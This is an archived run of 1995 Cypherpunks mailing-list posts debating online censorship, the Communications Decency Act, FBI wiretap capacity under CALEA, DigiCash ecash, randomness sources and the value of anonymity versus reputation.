In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 2 Nov 1995, Sten Drescher wrote:

> Rich Graves said:
>
> RG> On Thu, 2 Nov 1995 anonymous-remailer at shell.portal.com wrote:
>
> >> But control of Internet domain name registration means the ability to
> >> remove troublesome-or outspoken-computer systems from the
> >> network. Potentially, this control also confers the power to
> >> insinuate "phantom" domains into the network-for surveillance
> >> purposes, for example-or for real-time, automatic censorship.
>
> RG> Anyone capable of sending this message should have known that this
> RG> was complete BS.
>
> Is it? This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I thought was barely true. Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.". (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)

I stand corrected.
SurfWatch already allows people and organizations to do this voluntarily for anything that mentions sex. I am sure that certain sites are blocked by China, Vietnam, Singapore, and Fortune 1000 Corporations, for both "moral" and political reasons.

But it's not the DNS you need to control -- it's the routers. Which are still rather distributed. BBN is part of the Eastern Elite, though...

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJkNVY3DXUbM57SdAQG0ywQAiSlU7f1AujiaWQumqQmoIK8dyDoV32+Z
IlBYOxTG9uksIWPdGvQAkqcpPIx6OqOY2iA5FsX/YgjZNKjMjyrSf/cnopAM7GY3
SKDqc1thwMNAVmTFZn7emNafZ5bvwR86V340xdvH+/n396UXF9KeuqcIKk8yvKPI
QCOeBTmJ1RE=
=3Yeq
-----END PGP SIGNATURE-----

From cjl at welchlink.welch.jhu.edu Thu Nov 2 16:58:16 1995
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Fri, 3 Nov 1995 08:58:16 +0800
Subject: Cypherpunk recruiting opportunity
Message-ID:

C-punx,

Considering the amount of "preaching to the choir" that goes on here I thought that the following news item might supply a more suitable outlet for some of the more evangelical-minded Cypherpunks. After all, it is perfectly clear that the science of cryptography exemplifies some of the more exciting applications of otherwise-dry mathematics, and there is always a need for "voices of reason" in the councils of those who would make the 'Net safe for children.

___________________

Tech Help for Schools

While high-tech education visionaries are issuing apocalyptic warnings about the fate of the allegedly backward US school system, a privately sponsored group has launched a Peace Corps-style initiative to ease schools into the 21st century. The Massachusetts-based Tech Corps, which recruits volunteers to help schools harness computers and telecommunications technology, announced last month that it is going national.
The corps, whose chief sponsor is the Cellular Telecommunications Industry Association, will hold a conference in Washington DC on 30 October where people can learn how to start state chapters. Founded by Gary J. Beach, chief executive officer of Computerworld Inc., the corps last year recruited 300 volunteers through the magazine Computerworld who have been working in 12 school districts throughout Massachusetts. Karen Smith, Tech Corps' national director, says the response to the call for volunteers from people in industry, government agencies, and private consulting firms, has been "incredible." They help school districts in any way they are asked - such as by installing wiring, training teachers, persuading local industry to donate hardware, and helping schools construct World Wide Web homepages.

Interested parties can reach Tech Corps' own web page at: http://www.ustc.org

C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / )

From ACLUNATL at aol.com Thu Nov 2 17:23:41 1995
From: ACLUNATL at aol.com (ACLUNATL at aol.com)
Date: Fri, 3 Nov 1995 09:23:41 +0800
Subject: Organizations Needed to Sign Letter Against Online Censorship
Message-ID: <951102140740_10830594@emout04.mail.aol.com>

CYBER-LIBERTIES ALERT!!!
November 2, 1995

from:
American Civil Liberties Union
People for the American Way

ORGANIZATIONS NEEDED TO SUPPORT FREE SPEECH IN CYBERSPACE

SIGN THE LETTER BELOW TO OPPOSE FEDERAL ONLINE INDECENCY LEGISLATION!

A conference committee of House and Senate members is now meeting to determine the future of free speech in cyberspace. As most of you know, the House and Senate have now passed two different versions of the telecommunications bill that would each outlaw "indecent" speech over the Internet and other online services.
The conference committee now has the power to remove the online indecency provisions and to respect the philosophy overwhelmingly approved by the House in their 420-4 vote in favor of the Cox/Wyden Amendment -- online users, not government, should determine what online content is appropriate for themselves and their families.

Groups like the Christian Coalition are contacting the Conference Committee to urge even stricter criminal provisions for cyberspace than those contained in the current telecommunications provisions. Organizations dedicated to free speech must counter that movement with a groundswell of opposition to government control over online content.

THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR RIGHT TO FREE SPEECH IN CYBERSPACE.

Please sign your organization on to the letter below. To sign on, send an e-mail with your organization's name, address, phone number, and e-mail address to:

Jill Lesser
People for the American Way
jlesser at pfaw.org

The deadline for signatures is MONDAY, NOVEMBER 6, 1995, at 5 p.m. (Due to time constraints, we regret that we are unable to accept further revisions to the letter.)

------------------------

INDIVIDUAL USERS!!!

It is also essential that the Conference Committee hear from individual online users who are fundamentally opposed to these draconian speech crimes for cyberspace. Be sure to watch the Net for an action alert within the next 24 hours on how to voice your opposition to the Conferees.

------------------------

LETTER FROM ORGANIZATIONS OPPOSED TO FEDERAL ONLINE INDECENCY LEGISLATION

November ___, 1995

The Honorable Thomas J. Bliley Jr.
Chairman, Committee on Commerce United States House of Representatives Washington, DC 20515 The Honorable Larry Pressler Chairman, Committee on Commerce, Science and Transportation United States Senate Washington, DC 20510 Re: Parental Empowerment and Free Expression in Cyberspace Dear Chairmen Bliley and Pressler: We write on behalf of a diverse coalition of non-profit civil liberties, education, library, cultural, arts, labor and other civic organizations, and commercial producers and distributors of entertainment, information, journalism, and art, to express our strong belief that the Communications Decency Act (CDA) (also known as the "Exon Amendment"), sections 401 to 408 of S. 652, is unconstitutional, unworkable and unwise. We also strongly believe that language added to HR 1555, (section 403) amending the federal criminal code (the Hyde Amendment) is similarly unacceptable, because it creates new Exon-like speech crimes, including restricting constitutionally protected speech, mandating vicarious liability for on-line service providers and endorsing the violation of privacy rights of individuals. We urge you to delete from any final telecommunications legislation any provisions that impose a federal regulatory scheme on online content, hold online service providers liable for the messages of their customers, censor online communications in violation of the First Amendment, or encourage the violation of the privacy of online users. The CDA and Hyde Amendment contain an approach and philosophy that almost every member of the House of Representatives has already expressly rejected in their 420-4 vote in favor of the Online Family Empowerment provisions offered as an amendment to HR 1555 (section 104) by Representatives Cox (R-CA) and Wyden (D-OR). The CDA would impose unenforceable and intrusive government regulation on a newly developing forum for speech and commerce.
While failing to accomplish its intended goal of protecting children, it would unwisely impose governmental mandates on content and effectively establish federal standards for parenting in an online world. Similarly, the Hyde Amendment would force online service providers to act as censors of constitutionally protected speech and to invade the privacy of their users. By creating unconstitutional standards, passage of the CDA or the Hyde Amendment merely would assure a decade of expensive litigation and the uncertainty that inevitably accompanies such lawsuits. As the Conference Committee begins to consider the question of content control in the online environment, it must not permit unconstitutional provisions to remain in the bill. The Conferees' challenge is to avoid interfering with private sector development of effective blocking and screening technologies that empower online users to make personal decisions about content, to preserve the fundamental freedoms of the First Amendment, and to protect each individual's right to keep private communications private. The undersigned organizations believe that the following principles must be adhered to in any provision that affects the emerging online environment: THE FIRST AMENDMENT RIGHTS OF ALL AMERICANS MUST BE PRESERVED. Any effort to establish federal control over constitutionally protected speech must be opposed outright. There are alternative ways to protect access by children to certain material without infringing on the free speech rights of adults. The Supreme Court has repeatedly ruled that Congress may not impose a blanket ban on constitutionally protected speech. Any general restriction on constitutionally protected content must not only serve a compelling government interest but also must be implemented by the least restrictive means available. POLICIES MUST EMPOWER USERS -- INCLUDING PARENTS -- TO MAKE PERSONAL DECISIONS ABOUT CONTENT.
While most Americans agree that certain material is unsuitable for children, there certainly is no consensus about precisely what that material might be. The right to decide what children should see and hear is uniquely personal to the family -- government should have no role in dictating such personal and private matters. Instead, policies should encourage and empower individual parents to make decisions about the kinds of content to which their children should have access. THERE SHOULD BE NO INCENTIVE FOR GOVERNMENT OR PRIVATE INDUSTRY TO INFRINGE ON PRIVACY RIGHTS BY READING PRIVATE E-MAIL. Neither online service providers nor federal regulators should be in the business of perusing private e-mail for potentially objectionable content. The privacy rights in e-mail that Congress recognized in its passage of the Electronic Communications Privacy Act should not be undercut through censorship legislation. THE ONLINE WORLD MUST OPERATE FREE FROM INTRUSIVE AND UNENFORCEABLE GOVERNMENT CONTENT REGULATION. Online service providers and other sectors of the communications industry already are taking the initiative to develop technologies to permit users to make choices about the content to which they have access. Governmentally imposed standards and mandates are no substitute for the creativity of the marketplace. Users are demanding technology that will preserve the free flow of information, while simultaneously allowing them to make personal decisions about the content to which they or their children have access. CONCLUSION The undersigned organizations believe that Congress can formulate policies consistent with its deregulatory approach and consistent with the Constitution. We stand ready to work with all members of the Conference Committee to ensure that the above principles are satisfied. [The following organizations signed on to a similar letter last summer, before the House vote on the telecommunications bill.] 
Alliance For Community Media Alliance for Communications Democracy American Arts Alliance American Association of Advertising Agencies, Inc. American Association of Law Libraries American Association of University Professors American Civil Liberties Union American Communication Association American Library Association American Society of Journalists and Authors Association of American Publishers Association of Research Libraries Center For Democracy & Technology Chicago Computer Society Computer Professionals for Social Responsibility Council of Literary Magazines and Presses Electronic Privacy Information Center Feminists for Free Expression Freedom to Read Foundation Libraries for the Future The Literary Network Magazine Publishers Association Media Access Project Media Consortium National Assembly of State Arts Agencies National Association of Artists Organizations National Association of Media Arts & Culture National Campaign for Freedom of Expression National Coalition Against Censorship National Federation of Community Broadcasters National Gay & Lesbian Task Force National Public Telecomputing Network New York City Arts Coalition Newspaper Association of America Society for Electronic Access People For the American Way Action Fund Rock Out Censorship Theater Communications Group Writers Guild of America, East From hallam at w3.org Thu Nov 2 17:38:32 1995 From: hallam at w3.org (hallam at w3.org) Date: Fri, 3 Nov 1995 09:38:32 +0800 Subject: FBI seeks huge wiretapping system In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com> Message-ID: <9511022308.AA08199@zorch.w3.org> >Indeed, I have searched both the constitution and my collected works >of Nietzsche and found no reference to the inalienable right of >governments to listen in on any conversations, let alone the 1% of >conversations the FBI wants access to. Nietzsche is not a recognised authority on the US constitution nor are his works on ethical systems particularly definitive.
At best he points out the deficiencies in the ethical systems of Kant and hints at a limitation of reasoned approaches to ethics. His ethics of Will are hardly a fully finished system of ethics. If you want a contemporary system of ethics you would find Rorty, Habermas or Singer a far better choice. Even within the Nietzschean system of ethics it is very clear that listening in on the telephone conversations of "the botched and the bungled" would lie well within the rights of super-man. Indeed he is very explicit that there is no logical need for these people to have rights of any sort. Their lives are at the disposal of the great leader. The justification the NSA relies upon is the fact of a Federal law that makes it lawful to conduct wiretaps. I think the FBI have gone off into gaga land with the magnitude of their request. This is a good thing. They are not likely to get anything as a result. Phill From s1113645 at tesla.cc.uottawa.ca Thu Nov 2 17:47:48 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Fri, 3 Nov 1995 09:47:48 +0800 Subject: The ITAR, you don't leave home without it. Message-ID: A funny thought just occurred to me. Michael Froomkin was recently saying that the wonderful ITAR applies to American citizens regardless of country of location. Wouldn't this inane technicality apply to David Chaum in Holland? He is American, right? Ever get any problems at US customs David? The Digicash trial software certainly had crypto in it. I don't remember any export controls. From tony266 at vabeach.email.net Thu Nov 2 17:48:16 1995 From: tony266 at vabeach.email.net (tony266 at vabeach.email.net) Date: Fri, 3 Nov 1995 09:48:16 +0800 Subject: What!!! Message-ID: <9511021825.S84530450@vabeach.email.net> Can someone tell me what this cypherpunks is all about???
From hallam at w3.org Thu Nov 2 17:51:49 1995 From: hallam at w3.org (hallam at w3.org) Date: Fri, 3 Nov 1995 09:51:49 +0800 Subject: ecash remailer In-Reply-To: <9511022349.AA01867@hplyot.obspm.fr> Message-ID: <9511030011.AA09279@zorch.w3.org> >No. please get first hand facts. I have 'laundered' more than e$18000, by small >amounts of a couple of e$, and *no* bucks were lost(1). I I did, I got a direct report from a person who is extremely well known in the field of computer networks and security. A second person who is well known in the UNIX and security areas reported the same problem. The fact that you can operate the system correctly does not mean that it does not have bugs. These people were looking to break the system. >but hey... if >your wallet has a hole, or if you throw away your money, you won't >whine to the ATM, would you ? Yes, and I would win. Under regulation E of the Federal Reserve code my liability is limited to $50. The scenario you describe is analogous to my cash being stuck in the machine. This is the essential regulatory problem that e-cash faces. Regardless of the contract disclaimer it is by no means certain what liability Mark Twain have. The charges are significantly higher than those for credit cards, I see no validity in the argument that the small fees mean that a small liability should be incurred. Phill From futplex at pseudonym.com Thu Nov 2 17:54:36 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 3 Nov 1995 09:54:36 +0800 Subject: alt.anonymous.messages considered harmful In-Reply-To: <199511021625.RAA17800@utopia.hacktic.nl> Message-ID: <199511022113.QAA23862@opine.cs.umass.edu> Name Withheld by Request writes: [re: problems with the Usenet newsgroup model of pseud/anonymous message pools] > Denial of service attacks could be made somewhat less feasible by > making the pool accessible as a mailing list and via http. Mailing lists of course suffer the problem of strictly limited participation.
The web approach might work better, in some future with better privacy-protecting infrastructure in place. Specifically, if HTTP transactions with a popular web server were routinely encrypted, then all reasonably long visits to that site would act as cover traffic for a message pool on that server. As a bonus, you could have a spiffy form on the web page that searches the pool for you. In any event, the server could log your exploration. This returns us to the issue of strongly anonymous web proxies. (And we could imagine countermeasures, like daemons that search for randomly selected pseudonym tags to muddy the waters. As Tim might say, lots of issues.) Also, the mention of "as a mailing list _and_ via http" is significant. Making the pool available in multiple forms seems to be an unconditional benefit. -Futplex From perry at piermont.com Thu Nov 2 18:00:07 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 3 Nov 1995 10:00:07 +0800 Subject: Sources of randomness In-Reply-To: <9511022143.AA26596@tis.com> Message-ID: <199511022259.RAA06877@jekyll.piermont.com> Carl Ellison writes: > Almost all computers have a mouse and a normal signature, hand-written with > a mouse, has great gobs of noise. (I'm still working on the little PC > program to measure this -- but preliminary results show a minimum of 1 bit > of noise per mouse sample -- or 200 bits per signature. Final results may > get higher entropy rates, but I'll wait for the real results before > claiming that.) I have a brochure from a company that sells RS232 interfaced radiation monitors for only a couple hundred bucks. The things even come with a RNG demo program.
(The company is "Aware Electronics") Perry From dl at hplyot.obspm.fr Thu Nov 2 18:11:43 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Fri, 3 Nov 1995 10:11:43 +0800 Subject: ecash remailer In-Reply-To: <9511021209.ZM7820@morgan.com> Message-ID: <9511022349.AA01867@hplyot.obspm.fr> hallam at w3.org writes: > >So, refuse to buy their money. > >Demand open systems. > One problem a number of people have reported in DigiCash is disappearing > money. Several people have reported that if a transfer is misconfigured > the cash can flow out of the wallet, be rejected at the other end and > disappear from the system - i.e. misprinted names on cheques mean lost cash! No. please get first hand facts. I have 'laundered' more than e$ 18000, by small amounts of a couple of e$, and *no* bucks were lost(1). I do have to manually cancel some and to refund ppl from time to time, and i must admit I'm a bit behind my mail answering about that... but the money is *not* lost [for everybody] > This is bad and they report that Digicash did not respond to their > complaints. They prolly addressed the complaints to the wrong ppl, money does not disappear as long as you keep the log files to be able to "cancel" 'lost' ebucks There are/were a couple of small problems with the ecash software, but no money is lost, as long as you have a consistent file system [and I think they are working on an "auto recovery/auto cancel" feature...] note that there are some problems, initially the proposed shop software sucked for instance... and writing a better one was a key to get the system better, maybe it is a bit too early for real bank also... I think some bugs are still hanging around... but the idea is great ! [i just wish to have sources/protocol fully disclosed before I put real money in it...]
ps : I have no interest in digicash whatsoever except being participant to the trial and having a small shop {and thus having a fairly large account ;-) I wish they give prices to 'good' shops ;-0)} note1: at least I think no bucks were lost... not a high percentage at least,... I did have some troubles with the first software version and managed to *almost* lost stuff, my mismanipulation... but hey... if your wallet has a hole, or if you throw away your money, you won't whine to the ATM, would you ? dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept cryptographic PLO Legion of Doom explosion Cocaine Castro Croatian From joelm at eskimo.com Thu Nov 2 18:25:34 1995 From: joelm at eskimo.com (Joel McNamara) Date: Fri, 3 Nov 1995 10:25:34 +0800 Subject: Win95 password caching Message-ID: <199511030120.RAA06496@mail.eskimo.com> I was under the impression that MS used some variation of DES for encrypting the password lists (obviously much more secure than the nonsense XOR encryption used for the screen savers). Joel >This was not the question. He wants to prevent local Windows passwords >from being created for network-only users. This is a serious security >issue, because if a user enters her real network password for the Windows >password, and someone else later picks up the .PWL files, which are not >encrypted in a particularly secure way, then someone can get unauthorized >access to the network as the previous user(s). From perry at piermont.com Thu Nov 2 18:40:14 1995 From: perry at piermont.com (Perry E.
Metzger) Date: Fri, 3 Nov 1995 10:40:14 +0800 Subject: FBI seeks huge wiretapping system In-Reply-To: <9511022308.AA08199@zorch.w3.org> Message-ID: <199511022333.SAA06934@jekyll.piermont.com> hallam at w3.org writes: > > >Indeed, I have searched both the constitution and my collected works > >of Nietzsche and found no reference to the inalienable right of > >governments to listen in on any conversations, let alone the 1% of > >conversations the FBI wants access to. > > Nietzsche is not a recognised authority on the US constitution nor > are his works on ethical systems particularly definitive. I was being facetious. The point is that the government has no inherent right to tap our phones -- indeed, it didn't do so for nearly the first 200 years of our existence, and we did just fine -- better, in fact. Who among us has felt SAFER since they gained the ability? Has anyone been feeling more and more safe with time, since the more and more draconian laws granting the government more and more authority should have been "fixing" things, right? > Even within the Nietzschian system of ethics it is very clear that > listening in on the telephone conversations of "the botched and the > bungled" would lie well within the rights of super-man. Indeed he > is very explicit that there is no logical need for these people to > have rights of any sort. Their lives are at the disposal of the great > leader. Actually, that's a complete misinterpretation of Nietzsche, but that's another story. Perry From fc at all.net Thu Nov 2 18:49:28 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 3 Nov 1995 10:49:28 +0800 Subject: Anonymity and integrity In-Reply-To: <199511021934.OAA22117@opine.cs.umass.edu> Message-ID: <9511022111.AA15199@all.net> Futplex opines: ... [example was here - saving bandwidth]... > It seems to me that the integrity of the statements was rather easily verified > based on the merits of the statements themselves.
In particular, one or two > participants in the forum denied the claims made that they were members of > the editorial board. > > Granted, some people would have been more inclined to look askance at the > messages if they had known the author's True Name. But as the saying goes, > "past performance is not a guarantee of future results". You can choose to > doubt or believe a message because of the author's past reputation. But > reputation is not a reliable predictor of the integrity of future assertions. > It's a nice psychological crutch, but reliance on a "rational expectation" is > a long way from anything I would call "assurance" or "verification". It > doesn't prove anything. The only acceptable method of assurance I can see is > careful analysis of the propositions posited, and empirical verification of > the facts presented. Leaning on past reputation is accepting an odd form of > Proof by Authority. You are correct in stating that it doesn't prove anything, but that, it seems to me, is universally true. Nothing you can ever do can prove absolute integrity. The issue then comes down to whether you get more integrity by knowing (or having access to) the full body of information about a source. I think you do. > As it happened I had never heard of the True Name of the sender, so the > knowledge wasn't useful to me. But with the name, if you had chosen to, you could have done a great deal to learn about the history of the individual - through his published works, the many fine and not so fine things he has done in his career, etc. It is the availability of this reference material that makes the identity that much more useful. > > I understand that over time, reputations can be built up for pseudonyms > > (which are not necessarily anonyms) but then, with a pseudonym we might > > reasonably ask what the motive is for hiding the real identity. > [possible motives...] > > Without knowing the motive, how can we assess the statements?
> > By asking yourself if they seem to make sense, checking them against known > facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate > to assess anyone's statements. It is interesting that you take this line, especially in a forum where so many people trust so much that is posted without verifying it. For example, who on the cypher punks list verified the posting made by the people from MIT regarding Java? Was it simply the trusted MIT name that caused you to take it on faith? One of the underlying assumptions of the scientific establishment, and in fact science itself, is that results be published and verifiable, but in reality, almost all results are not verified, and even the most startling results aren't verified before many people begin to place trust in them. Example of a relatively quick response to such an assertion was the Cold Fusion situation a few years ago. On the other hand, the professor at the University of Pittsburgh who published results based on faked data (this is a gross simplification, I know) was widely believed for many years. The fact is that, today, there are simply too many results to verify them all along with the underlying data they depend on, the software used to generate them, etc. As a result, we are increasingly left with trusting the people rather than the results. Another issue is that the resources required to reproduce "big science" are not available to most people. Has anyone reproduced Adleman's experiments on biological computation? I know of nobody that has, and would love to do it myself, but I don't have the necessary equipment. This is an Earthshaking result with enormous long-term consequences, and I'm certain it's right because I agree with the underlying theory and don't see any reason for anyone to lie about it, but if Nostragnia of the Crydon Republic had published it anonymously, I would be much more hesitant to accept it and so would you (all).
> > In fact, how can we know that the original pseudonym still > > applies? Someone could kill you and take over your pseudonym, and even > > though we might hear of your death, the pseudonym might continue based > > on your reputation but with another actual source. > > Of course, the is-a-person problem has been discussed at great length. > Digital signatures are as effective for pseudonyms as for anyone else. > The messages we've seen "from Alice de `nonymous" might all have come from > different senders. They exhibit a common tone and style, but that doesn't > assure us of anything. In a sense that makes them more inviting, > since there's always the chance that a third party is attempting a clever > parody or a sly bit of character assassination. The question is not whether the signature is right, but rather, are there other reasons to believe or not believe - trust or not trust - etc. the sender. The less anonymity, the better this is revealed. > [...] > > It's an interesting concept that each statement should/could be taken on > > its own and evaluated independently of the rest of a person's life > > context, but in my experience, that has serious problems. > > In my experience, that's about all I can usually do in network communication. > In principle I _could_ devote scads of time to background investigations of > my correspondents, for all except strongly anonymous and strongly > pseudonymous parties, but I don't find that approach realistic. The point of non-pseudonyms is that if you want to know you can try to find out. If others know additional relevant information and decide to reveal it, you can tell that much the better. It also reduces blatant character assassination (which brings some level of civility) and forces people to take personal responsibility for what they say and do. All of these things, in my opinion, increase integrity.
-- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From enzo at ima.com Thu Nov 2 20:13:39 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Fri, 3 Nov 1995 12:13:39 +0800 Subject: censored? corrected [Steve Pizzo cited in The Spotlight] In-Reply-To: Message-ID: On Thu, 2 Nov 1995, Rich Graves wrote: > > > > In Hong Kong, the Internet wasn't quite strangled, but the British > > authorities who control that colony managed to throttle free electronic > > speech with the rest of the world until everything was bottlenecked into > > a few little-known satellite links. > > Hmm, few specifics here. I wonder if they would care to elaborate. Nah. Don't waste your time with that idiot, he doesn't know what he's talking about. The 1-week partial black-out here in Hong Kong happened because some providers had ignored some licencing requirements, and has been quickly solved once they agreed to comply. From perry at piermont.com Thu Nov 2 20:50:06 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 3 Nov 1995 12:50:06 +0800 Subject: Radiation Detectors from Aware Electronics Message-ID: <199511030430.XAA07086@jekyll.piermont.com> There have been several requests for information on the company that makes the radiation detectors with RS232 interfaces that I mentioned. Here is how to reach them: Aware Electronics P.O. Box 4299 Wilmington, DE 19807 Phone (800) 729-5397 (302) 655-3800 Perry From clarkm at cnct.com Thu Nov 2 21:33:13 1995 From: clarkm at cnct.com (clarkm at cnct.com) Date: Fri, 3 Nov 1995 13:33:13 +0800 Subject: Clinton Administration Plans 1.5 MILLION WIRETAPS Message-ID: <9511030814.AA0039@cnct-gw.new-york.net> Used with Permission From THE SPOTLIGHT 300 Independence Avenue, S.E. 
Washington, DC 20003 Subscriptions: (202) 546-5621 Technology & Liberty November 13, 1995 ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS By Clark Matthews clark.matthews at paranet.org Janet Reno's Justice Department and the FBI have directed U.S. telephone companies to prepare for up to 1.5 million simultaneous, electronic intercepts on Americans' telephones. The same directive requires the nation's phone companies to complete the necessary modifications to their equipment to create this massive surveillance apparatus from America's public telephone networks. Telephone companies are directed to have these capabilities in place by October 28, 1998, one week before the 1998 elections. The Clinton administration's claimed authorization for this massive high-tech domestic surveillance machine is the 1994 Communications Assistance for Law Enforcement Act (CALEA). The CALEA law is better known as infamous "Wiretap Access Bill", which has been discussed many times in these columns over the past 14 months. The CALEA law continues to be a hot topic because the proposed "Omnibus Counter-Terrorism Bill" of 1995 (H.R. 1710) contains provisions for setting up a national FBI surveillance center and paying for the national eavesdropping system with a 40% surcharge on all federal civil fines and property seizures. "CAPACITY REQUIREMENTS" The administration's eavesdropping diktats are buried in a set of technical "capacity requirements" that telephone companies are expected to meet in order to comply with the CALEA law. The capacity requirements appear on pages 53643-53646 of the Federal Register for October 16, 1995. Computer users can access this document electronically on the internet from the Electronic Privacy Information Center (http://www.epic.org) or by using wais (wais.access.gpo.gov). 
The "Capacity Requirements" published in the Federal Register correspond to a minimum of 540,000 and a maximum of 1.5 million simultaneous telephone "intercepts" in the United States. These electronic "intercepts" involve several different telephone surveillance techniques. They can record the telephone numbers you call and the numbers of people who call you, and then match the phone numbers in a special database "associating" you with your friends, relatives, acquaintances, journalists, activists, or businesses. They can also be programmed to monitor telephone conversations, intercept faxes, and record communications sessions between computer modems, including computer passwords and digital transactions. Here is a breakdown of the scope of the federal surveillance described by the capacity requirements: * Category 3 -- In 75% of the nation, phone companies must be prepared to activate federal intercepts on a maximum of 0.25% of all telephone subscribers, i.e. 250 telephones out of every 100,000. * Category 2 -- Is ill-defined. Phone companies in Category 2 areas must make their equipment capable of supporting federal interceptions on a maximum of 0.5% of all subscribers, i.e. 500 telephones per 100,000 * Category 1 -- Includes ill-defined "high interest" areas like major cities, where phone companies must be prepared to surveil 1% of all telephones, i.e. 1,000 phones per 100,000 WHAT THE NUMBERS MEAN According to FCC statistics for 1993, there were at least 150 million telephone numbers in our country -- and these figures omitted cellular phones, beepers, pagers, WATS lines, and other non-switched telephone services. Therefore Category 3 translates into 0.25% of at least 112.5 million telephones -- 281,250 intercepts nationwide. Assuming Category 2 equals 15% of the nation's phones, it translates into 0.5% of 22.5 million phones, another 122,500 potential wiretaps. Category 1 is 1% of the remaining 15 million phones: that's 150,000 more people. 
Add it up: 553,750 intercepts, minimum. And since "major cities" are "high interest" areas, the actual number is more likely to approach one million or more. Even these figures don't tell the whole story. The Justice Department directives have a built-in vagueness that allows areas to be re-defined. They can become "high-interest" hotspots at any time, under any circumstances. A currency crisis, for instance. Or a hotly contested election. Or perhaps a mysterious bombing provocation in the midwest. Furthermore, telephone companies do not have the luxury of meeting the minimum surveillance requirements. It's a technological reality that they must modify their equipment to meet the maximum requirements. That's because the FBI can re-define their surveillance responsibilities at any time, by branding their customers as "interesting". As the FBI's "interest" shifts from area to area, the whole country could rapidly come under the 1% surveillance directive. 1.5 million telephone intercepts. Or more. 'ONLY 1,157 WIRETAPS' The conduct of Clinton's law-enforcement leaders is especially outrageous, now that the true intentions of their KGB-like program have been revealed. When FBI Director Louis Freeh lobbied Congress for the Wiretap Bill last year, he cited FBI statistics claiming only 1,157 federal, state, and local electronic surveillance orders for all of 1993. In sworn Congressional testimony, the FBI director went on to say that his bureau had been thwarted in "several" attempts to intercept communications on specialized telephone equipment. Freeh cited obstacles like digital switches, digital loops, and similar privately owned, computerized business telephone switching systems, which he claimed prevented his agents from listening to telephone conversations, intercepting faxes, and capturing the data exchanged in computer modem sessions.
The built-in interception capacity of at least 1.5 million phone subscribers is well over 1,000 times the 1993 wiretapping number given to Congress by Director Freeh. WRITE YOUR REPRESENTATIVES The Justice Department instructed America's telephone companies to respond by November 15th in writing (in triplicate) with comments on their new national telephone surveillance requirements. Why not ask your elected representatives to drop them a line, too? Your Senators and Representative may well wonder how Louis Freeh's 1,157 1993 surveillance orders and "several" failed eavesdropping attempts turned into a license to monitor over a million phones in the nation's telephone system in less than two years. I sure do wonder. The "capacity requirements" for the 1994 Wiretap Law (CALEA) were published in the Federal Register of October 16. They are listed on pages 53643-53646. The address for comments is: Telecommunications Industry Liaison Unit (TILU), Federal Bureau of Investigation, P.O. Box 220450, Chantilly, VA 22022-0450. The FBI expects your representatives to write in triplicate. .---. .----------- * :::::::::::::::::::::::::::: / \ __ / ------ * clark.matthews at paranet.org / / \(..)/ ----- * :::::::::::::::::::::::::::: ////// ' \/ ` ---- * //// / // : : --- * PERMISSION TO \\/ / * / /` '--* COPY / REPOST \*/ * //..\\ x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x '//||\\` N E M O..M E..I M P U N E..L A C E S S I T x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x From wilcoxb at nagina.cs.colorado.edu Thu Nov 2 22:36:15 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Fri, 3 Nov 1995 14:36:15 +0800 Subject: [NOISE] Re: censored? 
corrected [Steve Pizzo cited in The Spotlight] In-Reply-To: Message-ID: <199511030614.XAA02702@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- > On Thu, 2 Nov 1995, Rich Graves wrote: > > > > > > > In Hong Kong, the Internet wasn't quite strangled, but the British > > > authorities who control that colony managed to throttle free electronic > > > speech with the rest of the world until everything was bottlenecked into > > > a few little-known satellite links. > > > > Hmm, few specifics here. I wonder if they would care to elaborate. Nah. > > Don't waste your time with that idiot, he doesn't know what he's talking > about. The 1-week partial black-out here in Hong Kong happened because some > providers had ignored some licencing requirements, and has been quickly > solved once they agreed to comply. That's one way to look at it. Of course since the "license requirements" had to do with some obscure administrivia that nobody thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong had thought to apply for it. One has to wonder why the gov't pulled the plug on 5 of them without so much as a warning, much less a chance to comply. Did I say 5? Oh yes. The largest HK ISP-- and the one with closest ties to the government-- had gone ahead and applied for the license just a couple of weeks before the blackout. Corruption is the modus operandi in HK, so I wouldn't be at all surprised if that one ISP got a special favor by being warned of the impending black-out, or even if it had a hand in instigating it. I'm sure you'll correct me if I've got any of my facts wrong. (c'punks relevance: (parts of) the Net is still vulnerable to governmental blackout. Is this relevant? Well, hardly, but perhaps interesting. And at least I flagged it.) Regards, Bryce signatures follow "To strive, to seek, to find and not to yield." 
